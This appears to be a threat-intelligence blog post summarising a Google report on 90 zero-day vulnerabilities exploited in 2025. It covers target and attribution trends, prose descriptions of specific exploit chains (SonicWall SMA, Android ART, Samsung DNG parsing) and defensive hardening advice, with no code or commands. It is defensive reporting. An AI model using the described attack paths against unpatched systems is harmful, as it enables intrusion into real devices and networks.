[TIMESTAMP: 2026-03-05 16:27 UTC] [AUTHOR: Runtime Rebel Intel] [SEVERITY: HIGH]

2025 Zero-Day Exploitation Review: Enterprise & OS Targets Dominate

HIGH Threat Intel #zero-day #threat intelligence #enterprise security

AI-Assisted Analysis

READ_TIME: 5 min read

// executive briefing tl;dr

[01] 90 zero-day vulnerabilities exploited in 2025, with a structural shift toward enterprise and operating system targets.
[02] Affected systems: Enterprise software, security appliances, networking devices, desktop/mobile operating systems, Oracle EBS, and WinRAR.
[03] Recommended remediation: Implement timely patching, architectural hardening, and continuous monitoring for effective defense.

Google Threat Intelligence Group (GTIG) tracked 90 zero-day vulnerabilities exploited in-the-wild throughout 2025, maintaining the elevated exploitation levels observed in recent years. This volume, while slightly lower than 2023’s peak of 100, surpassed 2024’s 78, confirming a stabilization trend within the 60-100 range since 2021. A critical finding is the continued structural shift towards increased exploitation of enterprise technologies, which accounted for a record 43 vulnerabilities (48%) in 2025. This underscores the growing interest in highly interconnected platforms that offer privileged access across networks and data assets, highlighting the evolving threat landscape for security professionals, according to Google Threat Intelligence Group (GTIG).

Key Trends in 2025 Zero-Day Exploitation

GTIG’s analysis revealed several pivotal shifts in attacker focus and methods:

Enterprise Software and Edge Devices as Primary Targets: For the first time, nearly half of all observed zero-day exploits targeted enterprise-grade technology. This includes security and networking devices (21 zero-days) that function as critical edge infrastructure. Threat actors leverage the lack of EDR technology on many such devices, creating blind spots for defenders and making them ideal initial access vectors. This highlights the urgent need to understand enterprise edge device zero-day exploitation patterns.
Operating Systems Emerge as Top End-User Target: Browser-based exploitation decreased significantly due to hardening measures, falling to less than 10% of total zero-day activity. Conversely, operating systems (both desktop and mobile) became the most exploited product category, accounting for 39 vulnerabilities (44%). Mobile OS exploitation, in particular, saw a notable rebound, driven by more complex exploit chains involving multiple vulnerabilities.
Commercial Surveillance Vendors (CSVs) Lead Attributions: For the first time, GTIG attributed more zero-day exploitation to CSVs than to traditional state-sponsored cyber espionage groups. This indicates broader access to sophisticated exploit capabilities and a changing dynamic in the global zero-day market.
PRC-Nexus Groups Remain Prolific: Consistent with long-term trends, People’s Republic of China (PRC)-nexus cyber espionage groups remained the most prolific state-sponsored actors, responsible for at least 10 zero-day exploits. These groups, such as UNC3886 and UNC5221, continued to focus on hard-to-monitor edge and networking devices to maintain persistent access. Observed mass exploitation suggests improved exploit development and distribution capabilities among these groups, indicating refined PRC-nexus cyber espionage TTPs.
Financially Motivated Actors Intensify Zero-Day Use: Financially motivated groups, including ransomware affiliates like FIN11 and UNC2165 (Evil Corp), nearly matched their 2023 high with nine zero-day exploits in 2025. Notable instances include the exploitation of CVE-2025-61882 and CVE-2025-61884 against Oracle E-Business Suite customers and CVE-2025-8088 in WinRAR for malware distribution.

Technical Analysis of Exploited Zero-Days

Attackers primarily sought RCE (Remote Code Execution) and Privilege Escalation via zero-day vulnerabilities. Common vulnerability types included injection and deserialization flaws in enterprise software, memory corruption issues (especially use-after-free) in user-centered products like browsers and OS kernels, and access control bypasses in edge devices.

Browser Sandbox Escapes and OS-Level Vulnerabilities

In 2025, browser sandbox escapes increasingly targeted underlying operating system or hardware components. For example, CVE-2025-2783 exploited improper handling of sentinel OS handles in Chrome on Windows, leading to code injection and sandbox escape. On Android, CVE-2025-48543, a Use-After-Free (UAF) in the Android Runtime (ART) during Java object deserialization, allowed arbitrary code execution within system_server via malicious Notification Parcel objects. Device-specific vulnerabilities included CVE-2025-27038 (Qualcomm Adreno GPU UAF), CVE-2025-6558 (Mali GPU out-of-bounds write), and CVE-2025-14174 (Apple Metal backend memory access), often chained with other vulnerabilities to achieve full compromise.

SonicWall Full-Chain Exploit

GTIG observed a multi-stage exploit for SonicWall Secure Mobile Access (SMA) 1000 series appliances. This chain leveraged an n-day authentication bypass (CVE-2025-23006), an unpatched deserialization vulnerability for RCE as the mgmt-server user, and a zero-day Local Privilege Escalation (CVE-2025-40602) in the ctrl-service to gain root privileges. This highlights how attackers combine vulnerabilities to achieve deep system access.

Samsung DNG Vulnerabilities

Specific zero-day vulnerabilities, CVE-2025-21043 and CVE-2025-43300, were exploited in Samsung’s Quram image parsing library through malicious Digital Negative (DNG) image files. These were typically delivered via WhatsApp and processed by the com.samsung.ipservice system service. The powerful memory corruption bugs allowed attackers to achieve arbitrary code execution within this unsandboxed service, granting access to a device’s entire MediaStore with minimal interaction (1-click exploitation).

Prioritizing Defenses and Mitigating Zero-Day Threats

Given the sustained volume of zero-day exploitation, organizations must adopt a proactive and resilient security posture. GTIG emphasizes that vulnerability exploitation remains the leading initial access vector in incident response investigations. Defenders must plan for compromise and implement robust measures. To adequately address how to detect 2025 zero-day exploitation, a multi-layered strategy is essential.

Architectural Hardening & Surface Reduction

Infrastructure: Segment DMZs, firewalls, and VPNs from critical assets to prevent Lateral Movement. Monitor application execution flow to block unauthorized database queries and shell commands. Restrict internet exposure of network ports to only those strictly required.
Personal Devices: Reduce attack surface by turning off cellular, Wi-Fi, and Bluetooth when not needed. Enable advanced protection modes like Android Advanced Protection Mode and iOS Lockdown Mode. Uninstall unused applications and disable unnecessary services.

Advanced Detection & Behavioral Monitoring

Infrastructure: Enforce strict driver blocklists and flag anomalous kernel-level behavior. Establish baselines for system processes to detect “Living off the Land” (LotL) activity and persistence mechanisms. Deploy canary tokens for high-fidelity alerts on Lateral Movement.
Personal Devices: Seek expert advice for suspicious links or crashes. Enroll in Google’s Advanced Protection Program and enable enhanced safe browsing features in web browsers.

Operational Response

Infrastructure: Maintain a Software Bill of Materials (SBoM) for rapid identification of affected libraries following CVE disclosures. Establish processes for immediate patching, even if it bypasses standard change management. When patches are unavailable, isolate systems and components using stop-gap measures such as disabling services or blocking specific ports at the perimeter.
Personal Devices: Regularly reboot devices. Exercise caution and avoid clicking on links or downloading attachments from unknown contacts.